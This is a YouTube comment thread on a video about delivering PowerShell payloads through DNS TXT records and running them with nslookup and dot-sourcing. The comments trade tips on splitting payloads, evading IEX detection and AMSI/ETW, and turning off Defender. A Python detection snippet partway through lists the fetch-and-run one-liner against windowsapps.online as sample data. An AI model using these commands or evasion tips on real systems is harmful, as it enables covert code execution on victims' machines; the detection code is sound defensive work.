PS, huge thanks to PlexTrac for sponsoring this video! PlexTrac is being crazy generous and put together a special page and bundle to help celebrate the channel's community -- and they are offering a FREE month of their collaborative reporting platform! j-h.io/plextrac
Thanks for the shout-out, John
Lovely PoC. It's my style; janky but fun to play with :)
Have you already tried to split the payload up into smaller 255-char strings? Apparently that's supported by TXT records, up to 4000 characters
The period before (nslookup...)[-1] is called "dot sourcing". It interprets whatever comes next as a command. This is what allows "notepad.exe" (with quotes) to execute when normally it would be parsed as a string. Check out the PowerShell about_Scripts help file or article for details.
cool
I love how you talk through the thought process, that's the best education I can get and what I love most about your channel dude. Thanks much for all the great content
Dang, John out here giving out hidden treasures like Al…. Good red teamer and deserves the recognition
Watching you work through your thought process is PURE GOLD! It's so great to see such a talented human work through problems and not just cut the video to make it seem like you got it right the first time!! Thank you for the great content!!
TXT records can store up to 4000 characters of data, but only in strings of 255. So you probably could do some more PowerShell voodoo to get it into a single continuous string for execution
your IT-powerlevel is over 9000! Awesome video, thx a lot!
LOVE that you kept the trial and error aspects and your thinking. Super fun.
That's awesome he is a friend of mine as well and I have recently started using that technique as well
I really appreciate the effort that you make in order to share your skills with community and such.
Hi John, it's 11pm in Australia so gotta sleep but keen to watch tomorrow. Keep up the amazing content, honestly the best
But ultimately there is still an IEX executed. Would still be captured by monitoring.
Always good to take time and see John work his magic
This was awesome to watch as always. Keep up the great work John.
You can also use the PowerDNS project to deliver PowerShell payloads using DNS as an egress channel.
17:32 I faced this challenge while setting up DKIM on my AWS domain. There you need to separate them by a new line in the same record box
I think some providers are implementing fixes. DigitalOcean is matching characters such as : ' " ( ) / and not propagating the record. When you remove the characters, the original PowerShell command is propagated. Not sure though.
That was a fantastic video and greatly appreciated! ❤
Even though IEX wasn't typed, I'm almost sure Windows Defender will still detect it when it gets executed, right? So in the end it's more of a proof of concept and an obscure way to hide logs.
I have the same question. Maybe if the payload would run completely off the initial DNS method, then windows defender could possibly be bypassed? Who knows
Wow a new trick for my trickbag, kudos !
13:05 Please let me know how to make terminal autocomplete options!!!
you’re a legend sir. ty for the great content
hmmm... nifty.
Also, your domain still has its ngrok TXT records...
Is there a way to use something like executable packing to make it smaller?
Did you still have to have defender disabled at the end to get that to run?
Did this through local dns. Ran it with ; with two commands in the same text-record. Download from local webserver ; run with powershell.
14:19 Real-time protection: "You can turn off this setting for a short time before it turns back on automatically"
Best part: let's set this to 9001 because it's over 9000
I understood that reference
OMGGG IT WORKED!!! I finally got this app and I
Hi John, recently I heard something about the "Microsoft Teams GIFShell Attack". Maybe in the future some example videos will be nice. GG
yeah, i saw this too.
but did windefender detect that ?
Sure did
It detected the payload but not the nslookup. It's a proof of concept showing that you *could* do something with this
how's it going so far?
Would you verify whether AMSI also detects this C2 connection attempt via DNS records or not, even if Windows Defender is activated?
Thank you John for the awesome content as always! I am only wondering what the gain is of avoiding executing IEX in the command prompt?
Security products alert on IEX / Invoke-Expression
@mindddfuzzz Thank you Khalid for the explanation! However, wouldn't AV/Defender detect the malicious payload being executed in memory? If that's the case, it would only be viable against old machines and older iterations of AV/EDRs that do not support in-memory detection and protection.
That got me thinking... Couldn't you develop a DNS server that acts as a C2 and receives payloads via DNS queries? I'm going to have to try that...
Could you use your own IP instead of Google's? So you can then return whatever you want, maybe more characters?
No. You need the victim to have access to a DNS server with your malicious records. You can do this, or control the victim's DNS server (router/ISP MITM), or get your DNS server to somehow be trusted as an authoritative DNS server
@y.vinitsky6452 You can specify the DNS host, like John does for Google's
Hi John, watched and studied your video, spent money on 2 domains, but it still doesn't work, because you don't use DNS for the reverse shell, you use the actual payload.
Thanks for the video, very helpful and well explained. Off to make so soft
That's pretty slick. :)
can it bypass windows defender?
To my knowledge you could add as many TXT records as needed, you just have to add quotes every 255 characters
I bumped around with this but left it out of the footage because I couldn't get something working -- nslookup seemingly returns the records in a random order. I suppose you can try to sort them within PowerShell, but that might have other constraints (more weird stuff in the logged PowerShell syntax, or having to finagle your payload to be "sortable" without issue).
What might be clever is adding a prefix and and and so on block comments to get it sorted and see if it can be sanely retrieved and executed
Nice to see your new video
Thanks for sharing this video. Is it not possible with a "short URL" to parse a PowerShell command? Ö.Ö
Seems way more sketchy than IEX Net.WebClient to me. You're still launching with -enc or IEX regardless. I can still bypass security in 2023 with a simple Net.WebClient IEX to a script with a solid AMSI/ETW bypass before decryption. This strat is like the forfiles trick to me and is better for application whitelist bypass rather than avoiding detection.
I imagine if you break down the callback payload into multiple TXT records, you can save them as a variable in the terminal, then concatenate everything together, then run the variable. Would that still leave traces in the system?
I'm gonna have to test it but I think it should work.
Regarding detection, you can log every PowerShell command with script block logging; even this nslookup would be logged
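The detection angle raised in this reply (script block logging) and the dot-sourcing explanation earlier in the thread can be combined into a simple triage rule: flag a logged script block only when a DNS TXT lookup feeds an execution primitive, while leaving ordinary SPF/DKIM/DMARC lookups alone. This is an added example, not code from the video; the sample script block texts are constructed, and the regexes are a starting point rather than a complete rule.

```python
import re

# Constructed sample Script Block Logging (Event ID 4104) texts, made up for
# this example; the second one mirrors the nslookup dot-sourcing one-liner
# discussed in the thread.
SAMPLE_SCRIPT_BLOCKS = [
    'Get-Process | Where-Object { $_.CPU -gt 100 }',
    '. (nslookup -q=txt windowsapps.online 8.8.8.8)[-1]',
    '$r = Resolve-DnsName -Type TXT example.test; Invoke-Expression ($r.Strings -join "")',
    'nslookup -type=txt _dmarc.example.test',
]

# A TXT lookup via nslookup or Resolve-DnsName (both are real tools/cmdlets).
TXT_LOOKUP = re.compile(
    r'(nslookup\s+-(?:q|query|type)=txt|Resolve-DnsName[^|;]*-Type\s+TXT)', re.I)

# An execution primitive at the start of a statement: dot-source, call
# operator, or Invoke-Expression/IEX, followed by whitespace, "(" or "$".
EXEC_PRIMITIVE = re.compile(
    r'(^|[;\s(])(\.|&|iex|Invoke-Expression)\s*[\s(\$]', re.I)


def classify_script_block(text):
    """Return (suspicious, reason) for one logged script block."""
    has_lookup = bool(TXT_LOOKUP.search(text))
    has_exec = bool(EXEC_PRIMITIVE.search(text))
    if has_lookup and has_exec:
        return True, "TXT record lookup result passed to an execution primitive"
    if has_lookup:
        return False, "TXT lookup only (benign, e.g. SPF/DKIM/DMARC checks)"
    return False, "no DNS TXT lookup"


def triage(blocks):
    """Classify a batch of script block texts; returns (text, suspicious, reason)."""
    return [(b, *classify_script_block(b)) for b in blocks]


if __name__ == "__main__":
    for text, suspicious, reason in triage(SAMPLE_SCRIPT_BLOCKS):
        print("ALERT " if suspicious else "ok    ", reason, "|", text)
```

Only the two blocks that both resolve a TXT record and hand the result to `.`, `&` or Invoke-Expression are flagged; the bare `_dmarc` lookup is reported as benign.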
Awesome trick 💪😎
when John wins... i feel like i win. lol. nice work
lol @ JH learning about text record limits :D
That's neat
SPF is a TXT record..
thangs!
Based af.
So, to put it shortly, what John did in 27 minutes in his video is: when you fire up your domain (windowsapps.online), then the DNS record automatically downloads the PowerShell script and runs it, giving the hacker an agent inside PowerShell Empire which gets control of my Windows device? @_JohnHammond please point out my mistake if I said it wrong.
Hello Sir, we need you to make courses on Udemy about hacking and any information you have that you can share. You really are intelligent.
luv it :D
Left and right data in a printed copy-paste
Hi John, love you bro, can we see a video on SSL pinning on Android, iOS and Windows? ♥
How many hits to rickroll with this?
I was about to get hacked with a crypted Invoke-Expression DNS
Enough to go mad
cool trick :)
👍
Avoid PowerShell.
cool
CrowdStrike doesn't like it if queries are run this way 🙃
HELLO CHEF!
Yayyyy
You should not wrap your TXT record in quotes, I think.
Kovter 2.0? o.o
🤛🤛
I have been watching you since a year ago, but today I got to know who the fuck Ed Sheeran is
Thanks for the interesting content, but I don't think I like the popping in ad banner, that smells too much like some cable TV ad to me... :/
Please stop using a generic 'shocked influencer face' in your thumbnails.
Bro, how to hack the hacker Bjorka 😁😁😁 he is trending in my country
👑I am Diploma in computer Engineer 👑 From Bangladesh
Are you sure that Microsoft Defender doesn't detect malware when you activate it again?